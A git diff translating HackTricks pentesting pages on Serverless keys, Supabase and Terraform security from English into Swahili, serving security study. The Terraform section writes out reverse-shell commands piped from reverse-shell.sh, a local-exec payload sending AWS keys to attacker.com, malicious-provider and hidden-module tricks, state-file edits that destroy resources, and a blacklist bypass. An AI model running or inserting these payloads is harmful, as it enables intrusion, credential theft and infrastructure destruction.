+**Funguo za Ufikiaji** na **Funguo za Leseni** ni ithibati muhimu zinazotumika kuthibitisha na kuidhinisha mwingiliano na CLI ya Serverless Framework.
-- **License Keys:** They are Unique identifiers required for authenticating access to Serverless Framework Version 4 which allows to login via CLI.
-- **Access Keys:** Credentials that allow the Serverless Framework CLI to authenticate with the Serverless Framework Dashboard. When login with `serverless` cli an access key will be **generated and stored in the laptop**. You can also set it as an environment variable named `SERVERLESS_ACCESS_KEY`.
+- **Funguo za Leseni:** Ni vitambulisho vya kipekee vinavyohitajika kwa uthibitishaji wa ufikiaji kwa Serverless Framework Toleo la 4 ambalo linaruhusu kuingia kupitia CLI.
+- **Funguo za Ufikiaji:** Ithibati zinazoruhusu CLI ya Serverless Framework kuthibitisha na Dashibodi ya Serverless Framework. Wakati wa kuingia na `serverless` cli funguo ya ufikiaji itaundwa na **kuhifadhiwa kwenye laptop**. Unaweza pia kuiseti kama mabadiliko ya mazingira yanayoitwa `SERVERLESS_ACCESS_KEY`.
-#### **Security Risks**
+#### **Hatari za Usalama**
-1. **Exposure Through Code Repositories:**
- - Hardcoding or accidentally committing Access Keys and License Keys to version control systems can lead to unauthorized access.
-2. **Insecure Storage:**
- - Storing keys in plaintext within environment variables or configuration files without proper encryption increases the likelihood of leakage.
-3. **Improper Distribution:**
- - Sharing keys through unsecured channels (e.g., email, chat) can result in interception by malicious actors.
-4. **Lack of Rotation:**
- - Not regularly rotating keys extends the exposure period if keys are compromised.
-5. **Excessive Permissions:**
- - Keys with broad permissions can be exploited to perform unauthorized actions across multiple resources.
+1. **Kufichuliwa Kupitia Hifadhi za Msimbo:**
+- Kuweka au kwa bahati mbaya kupeleka Funguo za Ufikiaji na Funguo za Leseni kwenye mifumo ya kudhibiti toleo kunaweza kusababisha ufikiaji usioidhinishwa.
+2. **Hifadhi Isiyo Salama:**
+- Kuhifadhi funguo katika maandiko wazi ndani ya mabadiliko ya mazingira au faili za mipangilio bila usimbaji sahihi kunaongeza uwezekano wa kufichuliwa.
+3. **Usambazaji Mbaya:**
+- Kushiriki funguo kupitia njia zisizo salama (k.m., barua pepe, gumzo) kunaweza kusababisha kukamatwa na wahalifu.
+4. **Kukosa Mzunguko:**
+- Kutokuzungusha funguo mara kwa mara kunaongeza kipindi cha kufichuliwa ikiwa funguo zitavunjwa.
+5. **Ruhusa Kupita Kiasi:**
+- Funguo zenye ruhusa pana zinaweza kutumika kufanya vitendo visivyoidhinishwa katika rasilimali nyingi.
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/supabase-security.md b/src/pentesting-ci-cd/supabase-security.md
index 6fa6219f8..e14e8cc26 100644
--- a/src/pentesting-ci-cd/supabase-security.md
+++ b/src/pentesting-ci-cd/supabase-security.md
@@ -1,50 +1,49 @@
-# Supabase Security
+# Usalama wa Supabase
{{#include ../banners/hacktricks-training.md}}
-## Basic Information
+## Taarifa za Msingi
-As per their [**landing page**](https://supabase.com/): Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings.
+Kulingana na [**ukurasa wao wa kutua**](https://supabase.com/): Supabase ni mbadala wa Firebase wa chanzo wazi. Anza mradi wako na hifadhidata ya Postgres, Uthibitishaji, APIs za papo hapo, Kazi za Edge, usajili wa Realtime, Hifadhi, na uwasilishaji wa Vector.
### Subdomain
-Basically when a project is created, the user will receive a supabase.co subdomain like: **`jnanozjdybtpqgcwhdiz.supabase.co`**
+Kimsingi, wakati mradi unaundwa, mtumiaji atapata subdomain ya supabase.co kama: **`jnanozjdybtpqgcwhdiz.supabase.co`**
-## **Database configuration**
+## **Mipangilio ya Hifadhidata**
> [!TIP]
-> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/database`**
+> **Taarifa hii inaweza kupatikana kutoka kiungo kama `https://supabase.com/dashboard/project//settings/database`**
-This **database** will be deployed in some AWS region, and in order to connect to it it would be possible to do so connecting to: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this was crated in us-west-1).\
-The password is a **password the user put** previously.
+Hii **hifadhidata** itapelekwa katika eneo fulani la AWS, na ili kuungana nayo itakuwa inawezekana kuungana na: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (hii iliundwa katika us-west-1).\
+Neno la siri ni **neno la siri ambalo mtumiaji aliweka** awali.
-Therefore, as the subdomain is a known one and it's used as username and the AWS regions are limited, it might be possible to try to **brute force the password**.
+Kwa hivyo, kwa kuwa subdomain ni maarufu na inatumika kama jina la mtumiaji na maeneo ya AWS ni ya kikomo, inaweza kuwa inawezekana kujaribu **kuvunjavunja nenosiri**.
-This section also contains options to:
+Sehemu hii pia ina chaguzi za:
-- Reset the database password
-- Configure connection pooling
-- Configure SSL: Reject plan-text connections (by default they are enabled)
-- Configure Disk size
-- Apply network restrictions and bans
+- Kurekebisha nenosiri la hifadhidata
+- Kuunda muunganisho wa pooling
+- Kuunda SSL: Kata muunganisho wa maandiko (kwa kawaida zimewezeshwa)
+- Kuunda ukubwa wa Diski
+- Kutumia vizuizi na marufuku za mtandao
-## API Configuration
+## Mipangilio ya API
> [!TIP]
-> **This data can be accessed from a link like `https://supabase.com/dashboard/project//settings/api`**
+> **Taarifa hii inaweza kupatikana kutoka kiungo kama `https://supabase.com/dashboard/project//settings/api`**
-The URL to access the supabase API in your project is going to be like: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
+URL ya kufikia API ya supabase katika mradi wako itakuwa kama: `https://jnanozjdybtpqgcwhdiz.supabase.co`.
-### anon api keys
+### funguo za anon api
-It'll also generate an **anon API key** (`role: "anon"`), like: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` that the application will need to use in order to contact the API key exposed in our example in
+Itazalisha pia **funguo ya API ya anon** (`role: "anon"`), kama: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` ambayo programu itahitaji kutumia ili kuwasiliana na funguo ya API iliyofichuliwa katika mfano wetu katika
-It's possible to find the API REST to contact this API in the [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), but the most interesting endpoints would be:
+Inawezekana kupata API REST ya kuwasiliana na API hii katika [**docs**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server), lakini mwisho wa kuvutia zaidi ungekuwa:
-Signup (/auth/v1/signup)
-
+Usajili (/auth/v1/signup)
```
POST /auth/v1/signup HTTP/2
Host: id.io.net
@@ -69,13 +68,11 @@ Priority: u=1, i
{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```
-
-Login (/auth/v1/token?grant_type=password)
-
+Ingia (/auth/v1/token?grant_type=password)
```
POST /auth/v1/token?grant_type=password HTTP/2
Host: hypzbtgspjkludjcnjxl.supabase.co
@@ -100,68 +97,63 @@ Priority: u=1, i
{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```
-
-So, whenever you discover a client using supabase with the subdomain they were granted (it's possible that a subdomain of the company has a CNAME over their supabase subdomain), you might try to **create a new account in the platform using the supabase API**.
+Hivyo, kila wakati unapotambua mteja anayetumia supabase na subdomain waliyotolewa (inawezekana kwamba subdomain ya kampuni ina CNAME juu ya subdomain yao ya supabase), unaweza kujaribu **kuunda akaunti mpya kwenye jukwaa kwa kutumia supabase API**.
-### secret / service_role api keys
+### funguo za siri / service_role api
-A secret API key will also be generated with **`role: "service_role"`**. This API key should be secret because it will be able to bypass **Row Level Security**.
+Funguo ya siri ya API pia itaundwa na **`role: "service_role"`**. Funguo hii ya API inapaswa kuwa ya siri kwa sababu itakuwa na uwezo wa kupita **Row Level Security**.
-The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
+Funguo ya API inaonekana kama hii: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
-### JWT Secret
+### JWT Siri
-A **JWT Secret** will also be generate so the application can **create and sign custom JWT tokens**.
+**JWT Siri** pia itaundwa ili programu iweze **kuunda na kusaini token za JWT za kawaida**.
-## Authentication
+## Uthibitishaji
-### Signups
+### Usajili
> [!TIP]
-> By **default** supabase will allow **new users to create accounts** on your project by using the previously mentioned API endpoints.
+> Kwa **kawaida** supabase itaruhusu **watumiaji wapya kuunda akaunti** kwenye mradi wako kwa kutumia viungo vya API vilivyotajwa hapo awali.
-However, these new accounts, by default, **will need to validate their email address** to be able to login into the account. It's possible to enable **"Allow anonymous sign-ins"** to allow people to login without verifying their email address. This could grant access to **unexpected data** (they get the roles `public` and `authenticated`).\
-This is a very bad idea because supabase charges per active user so people could create users and login and supabase will charge for those:
+Hata hivyo, akaunti hizi mpya, kwa kawaida, **zitahitaji kuthibitisha anwani yao ya barua pepe** ili waweze kuingia kwenye akaunti. Inawezekana kuwezesha **"Ruhusu kuingia kwa siri"** ili kuruhusu watu kuingia bila kuthibitisha anwani yao ya barua pepe. Hii inaweza kutoa ufikiaji wa **data zisizotarajiwa** (wanapata majukumu `public` na `authenticated`).\
+Hii ni wazo mbaya sana kwa sababu supabase inatoza kwa kila mtumiaji aliye hai hivyo watu wanaweza kuunda watumiaji na kuingia na supabase itatoza kwa hao:
-### Passwords & sessions
+### Nywila & vikao
-It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\
-It's recommended to **improve the requirements as the default ones are weak**.
+Inawezekana kuashiria urefu wa chini wa nywila (kwa kawaida), mahitaji (hapana kwa kawaida) na kuzuia matumizi ya nywila zilizovuja.\
+Inapendekezwa **kuboresha mahitaji kwani yale ya kawaida ni dhaifu**.
-- User Sessions: It's possible to configure how user sessions work (timeouts, 1 session per user...)
-- Bot and Abuse Protection: It's possible to enable Captcha.
+- Vikao vya Watumiaji: Inawezekana kusanidi jinsi vikao vya watumiaji vinavyofanya kazi (muda wa kuisha, kikao 1 kwa mtumiaji...)
+- Ulinzi wa Bot na Dhuluma: Inawezekana kuwezesha Captcha.
-### SMTP Settings
+### Mipangilio ya SMTP
-It's possible to set an SMTP to send emails.
+Inawezekana kuweka SMTP kutuma barua pepe.
-### Advanced Settings
+### Mipangilio ya Juu
-- Set expire time to access tokens (3600 by default)
-- Set to detect and revoke potentially compromised refresh tokens and timeout
-- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default)
-- Max Direct Database Connections: Max number of connections used to auth (10 by default)
-- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default)
+- Weka muda wa kuisha kwa funguo za ufikiaji (3600 kwa kawaida)
+- Weka kugundua na kufuta funguo za upya zinazoweza kuwa na hatari na muda wa kuisha
+- MFA: Onyesha ni vigezo vingapi vya MFA vinaweza kuandikishwa kwa wakati mmoja kwa mtumiaji (10 kwa kawaida)
+- Max Direct Database Connections: Idadi ya juu ya muunganisho inayotumika kuthibitisha (10 kwa kawaida)
+- Max Request Duration: Muda wa juu unaoruhusiwa kwa ombi la Auth kudumu (10s kwa kawaida)
-## Storage
+## Hifadhi
> [!TIP]
-> Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets).
+> Supabase inaruhusu **kuhifadhi faili** na kuzipatia ufikiaji kupitia URL (inatumia S3 buckets).
-- Set the upload file size limit (default is 50MB)
-- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
-- It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
+- Weka kikomo cha ukubwa wa faili zinazopakiwa (kawaida ni 50MB)
+- Muunganisho wa S3 unapatikana kwa URL kama: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
+- Inawezekana **kuomba funguo za ufikiaji za S3** ambazo zinaundwa na `access key ID` (mfano `a37d96544d82ba90057e0e06131d0a7b`) na `secret access key` (mfano `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
## Edge Functions
-It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly).
+Inawezekana **kuhifadhi siri** katika supabase pia ambazo zitakuwa **zinapatikana na edge functions** (zinaweza kuundwa na kufutwa kutoka kwenye wavuti, lakini haiwezekani kufikia thamani yao moja kwa moja).
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md
index 09b875ff2..9ec947c63 100644
--- a/src/pentesting-ci-cd/terraform-security.md
+++ b/src/pentesting-ci-cd/terraform-security.md
@@ -6,303 +6,273 @@
[From the docs:](https://developer.hashicorp.com/terraform/intro)
-HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
+HashiCorp Terraform ni **chombo cha miundombinu kama msimbo** ambacho kinakuruhusu kufafanua **rasilimali za wingu na za ndani** katika faili za usanidi zinazoweza kusomeka na binadamu ambazo unaweza kuandika, kutumia tena, na kushiriki. Kisha unaweza kutumia mtiririko wa kazi unaofanana ili kuandaa na kusimamia miundombinu yako yote wakati wa mzunguko wake wa maisha. Terraform inaweza kusimamia vipengele vya chini kama vile kompyuta, uhifadhi, na rasilimali za mtandao, pamoja na vipengele vya juu kama vile entries za DNS na vipengele vya SaaS.
#### How does Terraform work?
-Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API.
+Terraform inaunda na kusimamia rasilimali kwenye majukwaa ya wingu na huduma nyingine kupitia interfaces zao za programu za maombi (APIs). Watoa huduma wanaruhusu Terraform kufanya kazi na karibu jukwaa au huduma yoyote yenye API inayopatikana.
.png>)
-HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more.
+HashiCorp na jamii ya Terraform tayari wameandika **zaidi ya watoa huduma 1700** kusimamia maelfu ya aina tofauti za rasilimali na huduma, na nambari hii inaendelea kukua. Unaweza kupata watoa huduma wote wanaopatikana hadharani kwenye [Terraform Registry](https://registry.terraform.io/), ikiwa ni pamoja na Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, na mengine mengi.
-The core Terraform workflow consists of three stages:
+Mtiririko wa msingi wa Terraform unajumuisha hatua tatu:
-- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer.
-- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration.
-- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines.
+- **Write:** Unafafanua rasilimali, ambazo zinaweza kuwa kati ya watoa huduma na huduma mbalimbali za wingu. Kwa mfano, unaweza kuunda usanidi wa kupeleka programu kwenye mashine za virtual katika mtandao wa Virtual Private Cloud (VPC) pamoja na vikundi vya usalama na balancer ya mzigo.
+- **Plan:** Terraform inaunda mpango wa utekelezaji unaofafanua miundombinu itakayoundwa, kusasishwa, au kuharibiwa kulingana na miundombinu iliyopo na usanidi wako.
+- **Apply:** Kwa idhini, Terraform inatekeleza operesheni zilizopendekezwa kwa mpangilio sahihi, ikiheshimu utegemezi wowote wa rasilimali. Kwa mfano, ikiwa unasasisha mali za VPC na kubadilisha idadi ya mashine za virtual katika VPC hiyo, Terraform itaunda upya VPC kabla ya kupanua mashine za virtual.
.png>)
### Terraform Lab
-Just install terraform in your computer.
+Sakinisha terraform kwenye kompyuta yako.
-Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads).
+Hapa una [mwongozo](https://learn.hashicorp.com/tutorials/terraform/install-cli) na hapa una [njia bora ya kupakua terraform](https://www.terraform.io/downloads).
## RCE in Terraform
-Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files**.
+Terraform **haina jukwaa linalofichua ukurasa wa wavuti au huduma ya mtandao** tunaweza kuhesabu, kwa hivyo, njia pekee ya kuathiri terraform ni **kuwa na uwezo wa kuongeza/kubadilisha faili za usanidi za terraform**.
-However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly.
+Hata hivyo, terraform ni **kipengele nyeti sana** kuathiri kwa sababu itakuwa na **ufikiaji wa kijasiri** kwa maeneo tofauti ili iweze kufanya kazi ipasavyo.
-The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**.
+Njia kuu kwa mshambuliaji kuwa na uwezo wa kuathiri mfumo ambapo terraform inafanya kazi ni **kuathiri hifadhi inayohifadhi usanidi wa terraform**, kwa sababu kwa wakati fulani wata **fasiriwa**.
-Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**:
+Kwa kweli, kuna suluhisho huko nje ambazo **zinafanya mpango wa terraform/kuomba kiotomatiki baada ya PR** kuundwa, kama **Atlantis**:
{{#ref}}
atlantis-security.md
{{#endref}}
-If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`.
+Ikiwa una uwezo wa kuathiri faili ya terraform kuna njia tofauti unaweza kufanya RCE wakati mtu anatekeleza `terraform plan` au `terraform apply`.
### Terraform plan
-Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`.
+Terraform plan ni **amri inayotumika zaidi** katika terraform na waendelezaji/misitu inayotumia terraform huipigia simu kila wakati, hivyo **njia rahisi ya kupata RCE** ni kuhakikisha unachafua faili ya usanidi wa terraform ambayo itatekeleza amri zisizo za kawaida katika `terraform plan`.
**Using an external provider**
-Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`.
-
-Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`:
+Terraform inatoa [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) ambayo inatoa njia ya kuunganishwa kati ya Terraform na programu za nje. Unaweza kutumia chanzo cha data `external` kuendesha msimbo wowote wakati wa `plan`.
+Kuingiza katika faili ya usanidi wa terraform kitu kama ifuatavyo kitatekeleza shell ya rev wakati wa kutekeleza `terraform plan`:
```javascript
data "external" "example" {
- program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
+program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
+**Kutumia mtoa huduma maalum**
-**Using a custom provider**
-
-An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)):
-
+Mshambuliaji anaweza kutuma [mtoa huduma maalum](https://learn.hashicorp.com/tutorials/terraform/provider-setup) kwenye [Terraform Registry](https://registry.terraform.io/) na kisha kuiongeza kwenye msimbo wa Terraform katika tawi la kipengele ([mfano kutoka hapa](https://alex.kaskaso.li/post/terraform-plan-rce)):
```javascript
- terraform {
- required_providers {
- evil = {
- source = "evil/evil"
- version = "1.0"
- }
- }
- }
+terraform {
+required_providers {
+evil = {
+source = "evil/evil"
+version = "1.0"
+}
+}
+}
provider "evil" {}
```
+Mtoa huduma hupakuliwa katika `init` na utaendesha msimbo mbaya wakati `plan` inatekelezwa
-The provider is downloaded in the `init` and will run the malicious code when `plan` is executed
+Unaweza kupata mfano katika [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
-You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
+**Kutumia rejeleo la nje**
-**Using an external reference**
-
-Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions:
-
-- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
+Chaguzi zote zilizotajwa ni muhimu lakini si za siri sana (ya pili ni ya siri zaidi lakini ngumu zaidi kuliko ya kwanza). Unaweza kufanya shambulio hili hata kwa njia **ya siri zaidi**, kwa kufuata mapendekezo haya:
+- Badala ya kuongeza rev shell moja kwa moja kwenye faili ya terraform, unaweza **kupakia rasilimali ya nje** ambayo ina rev shell:
```javascript
module "not_rev_shell" {
- source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
+source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
-
You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
-- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
+- Katika rasilimali ya nje, tumia kipengele cha **ref** kuficha **kodi ya terraform rev shell katika tawi** ndani ya repo, kitu kama: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
### Terraform Apply
-Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
-You just need to make sure some payload like the following ones ends in the `main.tf` file:
-
+Terraform apply itatekelezwa ili kutekeleza mabadiliko yote, unaweza pia kuitumia vibaya kupata RCE kwa kuingiza **faili ya Terraform yenye** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
+Unahitaji tu kuhakikisha kuwa payload fulani kama ifuatavyo inamalizika katika faili ya `main.tf`:
```json
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
- provisioner "local-exec" {
- command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
- }
+provisioner "local-exec" {
+command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+}
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
- provisioner "local-exec" {
- command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
- }
+provisioner "local-exec" {
+command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
+}
}
```
-
Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**.
## Secrets Dumps
You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like:
-
```json
output "dotoken" {
- value = nonsensitive(var.do_token)
+value = nonsensitive(var.do_token)
}
```
-
## Abusing Terraform State Files
-In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file:
+Katika hali ambapo una ufikiaji wa kuandika kwenye faili za hali za terraform lakini huwezi kubadilisha msimbo wa terraform, [**utafiti huu**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) unatoa chaguzi za kuvutia za kunufaika na faili hiyo:
### Deleting resources
-There are 2 ways to destroy resources:
+Kuna njia 2 za kuharibu rasilimali:
-1. **Insert a resource with a random name into the state file pointing to the real resource to destroy**
-
-Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page:
+1. **Weka rasilimali yenye jina la nasibu kwenye faili la hali ikielekeza kwenye rasilimali halisi ya kuharibu**
+Kwa sababu terraform itaona kwamba rasilimali hiyo haipaswi kuwepo, itaiharibu (ikifuatilia kitambulisho halisi cha rasilimali kilichotajwa). Mfano kutoka ukurasa wa awali:
```json
{
- "mode": "managed",
- "type": "aws_instance",
- "name": "example",
- "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
- "instances": [
- {
- "attributes": {
- "id": "i-1234567890abcdefg"
- }
- }
- ]
+"mode": "managed",
+"type": "aws_instance",
+"name": "example",
+"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
+"instances": [
+{
+"attributes": {
+"id": "i-1234567890abcdefg"
+}
+}
+]
},
```
+2. **Badilisha rasilimali ili kufuta kwa njia ambayo haiwezekani kuisasisha (hivyo itafutwa na kuundwa upya)**
-2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)**
-
-For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it.
+Kwa mfano la EC2, kubadilisha aina ya mfano ni ya kutosha kufanya terraform ifute na kuunda upya.
### RCE
-It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research:
-
+Pia inawezekana [kuunda mtoa huduma maalum](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) na kubadilisha tu mmoja wa watoa huduma katika faili ya hali ya terraform kwa yule mbaya au kuongeza rasilimali tupu na mtoa huduma mbaya. Mfano kutoka kwa utafiti wa awali:
```json
"resources": [
{
- "mode": "managed",
- "type": "scaffolding_example",
- "name": "example",
- "provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
- "instances": [
+"mode": "managed",
+"type": "scaffolding_example",
+"name": "example",
+"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
+"instances": [
- ]
+]
},
```
-
### Replace blacklisted provider
-In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well.
-
+Katika hali unayokutana nayo ambapo `hashicorp/external` imewekwa kwenye orodha ya mablacklist, unaweza kuitekeleza tena `external` provider kwa kufanya yafuatayo. Kumbuka: Tunatumia fork ya external provider iliyochapishwa na https://registry.terraform.io/providers/nazarewk/external/latest. Unaweza kuchapisha fork yako mwenyewe au utekelezaji tena pia.
```terraform
terraform {
- required_providers {
- external = {
- source = "nazarewk/external"
- version = "3.0.0"
- }
- }
+required_providers {
+external = {
+source = "nazarewk/external"
+version = "3.0.0"
+}
+}
}
```
-
-Then you can use `external` as per normal.
-
+Kisha unaweza kutumia `external` kama kawaida.
```terraform
data "external" "example" {
- program = ["sh", "-c", "whoami"]
+program = ["sh", "-c", "whoami"]
}
```
-
-## Automatic Audit Tools
+## Zana za Ukaguzi wa Otomatiki
### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
-Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats.
-
-- **Features:**
- - Real-time scanning for security vulnerabilities and compliance issues.
- - Integration with version control systems (GitHub, GitLab, Bitbucket).
- - Automated fix pull requests.
- - Detailed remediation advice.
-- **Sign Up:** Create an account on [Snyk](https://snyk.io/).
+Snyk inatoa suluhisho kamili la skanning ya Infrastructure as Code (IaC) linalogundua udhaifu na mipangilio isiyo sahihi katika Terraform, CloudFormation, Kubernetes, na mifumo mingine ya IaC.
+- **Vipengele:**
+- Skanning ya wakati halisi kwa ajili ya udhaifu wa usalama na masuala ya ufuatiliaji.
+- Uunganisho na mifumo ya udhibiti wa toleo (GitHub, GitLab, Bitbucket).
+- Maombi ya kurekebisha yaliyotolewa kiotomatiki.
+- Ushauri wa kina wa kurekebisha.
+- **Jisajili:** Unda akaunti kwenye [Snyk](https://snyk.io/).
```bash
brew tap snyk/tap
brew install snyk
snyk auth
snyk iac test /path/to/terraform/code
```
-
### [Checkov](https://github.com/bridgecrewio/checkov)
